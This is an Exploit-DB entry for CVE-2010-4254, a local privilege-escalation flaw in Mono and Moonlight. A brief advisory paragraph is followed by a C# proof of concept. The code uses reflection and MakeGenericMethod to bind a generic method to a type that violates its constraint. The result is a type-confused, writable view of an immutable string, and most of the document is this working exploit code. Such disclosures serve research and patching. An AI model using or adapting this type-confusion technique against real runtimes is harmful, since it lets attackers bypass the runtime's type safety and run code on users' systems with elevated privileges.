Mono/Moonlight Generic Type Argument - Local Privilege Escalation

EDB-ID: 15974
CVE: 2010-4254
OSVDB-ID: N/A
Author: Chris Howie
Published: 2011-01-11

Mono and Moonlight are prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. 


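using System;
using System.Reflection;

// Unrelated class whose fields are named after a string's length and first character.
public class FakeString {
    public int length;
    public char start_char;
}

public class TestCase {
    // The constraint says T must derive from FakeString, so the implicit
    // conversion from T to FakeString compiles without a cast.
    private static FakeString UnsafeConversion<T>(T thing)
        where T : FakeString
    {
        return thing;
    }

    public static void Main() {
        var a = "foo";
        var b = MakeMutable(a);

        // b refers to the same object as a, viewed through FakeString's fields.
        b.start_char = 'b';
    }

    private static FakeString MakeMutable(string s)
    {
        var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static);
        // string does not derive from FakeString, so this instantiation violates the constraint on T.
        var m2 = m.MakeGenericMethod(typeof(string));

        var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2);

        return d(s);
    }
}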